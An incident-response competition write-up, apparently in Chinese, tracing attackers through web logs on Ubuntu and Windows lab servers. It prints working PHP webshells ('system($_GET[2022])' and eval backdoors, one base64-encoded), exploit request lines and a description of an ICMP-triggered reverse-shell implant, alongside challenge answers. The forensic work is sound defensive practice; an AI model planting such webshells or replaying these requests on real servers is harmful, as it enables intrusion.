Ubuntu应急响应
|----|--------------------------------------|
| 1 | 提交攻击者的IP地址 |
| 2 | 识别攻击者使用的操作系统 |
| 3 | 找出攻击者资产收集所使用的平台 |
| 4 | 提交攻击者目录扫描所使用的工具名称 |
| 5 | 提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS |
| 6 | 找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码 |
| 7 | 找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径) |
| 8 | 识别系统中存在的恶意程序进程,提交进程名 |
| 9 | 找到文件系统中的恶意程序文件并提交文件名(完整路径) |
| 10 | 简要描述该恶意文件的行为 |
root
1234546
1.提交攻击者的IP地址
一直找日志
是这个
more access.log.1 
从192.168.1.5到192.168.1.7就不一样了猜测攻击者是192.168.1.7
192.168.1.5 - - [24/Apr/2022:15:11:48 +0000] "GET /data/captcha/ckstr.php HTTP/1.1" 200 1499 "http://192.168.1.3/message.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"::1 - - [24/Apr/2022:15:11:55 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) (internal dummy connection)"
192.168.1.7 - - [24/Apr/2022:15:14:32 +0000] "GET / HTTP/1.1" 408 482 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:14:52 +0000] "GET /favicon.ico HTTP/1.1" 200 39411 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET / HTTP/1.1" 200 3663 "https://www.shodan.io/search?query=php" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"192.168.1.7
2.识别攻击者使用的操作系统
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"Linux x86_64
3.找出攻击者资产收集所使用的平台
日志中找到
4.提交攻击者目录扫描所使用的工具名称
192.168.1.7 - - [24/Apr/2022:15:17:45 +0000] "GET /rHdA9nYoF68B HTTP/1.1" 404 43
4 "-" "DIRSEARCH"DIRSEARCH
5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "GET /shoppingcart.php?a=addshopinggcart&goodsid=1&buynum=2&goodsattr=as%26time=999999999999999999%26uid=/../../../pproc/self/cwd/1.php%26a=1 HTTP/1.1" 200 425 "-" "python-requests/2.23.0"
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "POST //data/avatar/upload.php?a=upploadavatar&input=2690b1IhecCIpeAK%2BnPLfbnP3AF%2F9TwHSnAxI%2BAfZ%2BC0xIaO33AMyGeeGhpEIO2WxXowgLJ%2FFbPKzhcd1x4Xlwdbs1Pjg5V6Yy2MSj1yzlbw6eHXc6Mu%2FZ5BSbVUolg2kh400WeVCGgHRYc4Zu8X4VONadz5WOuerWpdPmDRtAjQb8lZjMVQDSPgY&_SERVER%5BHTTP_USER_AGENT%55D%5B%5D=1 HTTP/1.1" 200 296 "-" "python-requests/2.23.0"这两条日志
先是上传了一个php文件
然后命令执行了
24/Apr/2022:15:25:53
24/04/22:15:25:53
6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码
根据上题日志
上传了一个1.php
find / -name 1.php
root@webserver:/# cd /var/www/html/data/avatar
root@webserver:/var/www/html/data/avatar# ls
1.php images index.php lib upload.php
root@webserver:/var/www/html/data/avatar# cat 1.php
<?php system($_GET[2022]);?>
#define width 20
#define height 20文件名:1.php
后门密码:2022
7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)
root@webserver:/var/www/html# cat footer.php
<!-- weblink-->
<div class="weblink">
<?php
$dosql->Execute("SELECT * FROM `#@__weblink` WHERE classid=1 AND checkinfo=true ORDER BY orderid,id DESC");
while($row = $dosql->GetArray())
{
?>
<a href="<?php echo $row['linkurl']; ?>" target="_blank"><?php echo $row['webname']; ?></a>
<?php
}
?>
</div>
<!-- /weblink-->
<!-- footer-->
<div class="footer"><?php echo $cfg_copyright ?><br />网站采用 <a href="http://phpmywind.com" target="_blank">PHPMyWind</a> 核心</div>
<!-- /footer-->
<?php
@eval($_POST['catchmeifyoucan'])
echo GetQQ();
//将流量统计代码放在页面最底部
$cfg_countcode;
?>一个后门
/var/www/html/footer.php
8.识别系统中存在的恶意程序进程,提交进程名
ps aux
cat prism
9.找到文件系统中的恶意程序文件并提交文件名(完整路径)
根据上题
/root/.mal/prism
10.简要描述该恶意文件的行为
根据上上题
等待来自攻击者的ICMP数据包,该数据包包含要回连的主机、端口和密钥,被激活后将/bin/sh回连到主机指定端口,供攻击者执行命令
windows服务器应急响应
首先环境是这样的,比linux应急响应好多了,有图形界面...
1.请提交攻击者攻击成功的第一时间,格式:YY:MM:DD hh:mm:ss
在phpstudy目录下搜索日志文件
省赛用的是别人的工具,只能肉眼观察喽,个人习惯于010,可惜省赛有可能不提供...
这条是登录了管理员账号
29/Apr/2023:22:45:23
23:04:29 10:45:23
2.请提交攻击者的浏览器版本
Firefox/110.0
3.请提交攻击者目录扫描所使用的工具名称
Fuzz Faster U Fool
4.找到攻击者写入的恶意后门文件,提交文件名(完整路径)
C:\phpstudy_pro\WWW\.x.php
5.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)
PD9waHAgQGV2YWwoJF9SRVFVRVNUWyd4J10pOyA/Pg==
C:\phpstudy_pro\WWW\usr\themes\default\post.php
6.请提交内存中可疑进程的PID
在资源监视器里发现有外联
1200
7.请提交攻击者执行过几次修改文件访问权限的命令
2
8.请指出可疑进程采用的自动启动的方式
策略组->计算机配置->Windows设置->脚本(启动/关机)->启动->属性
发现自启动了一个bat脚本
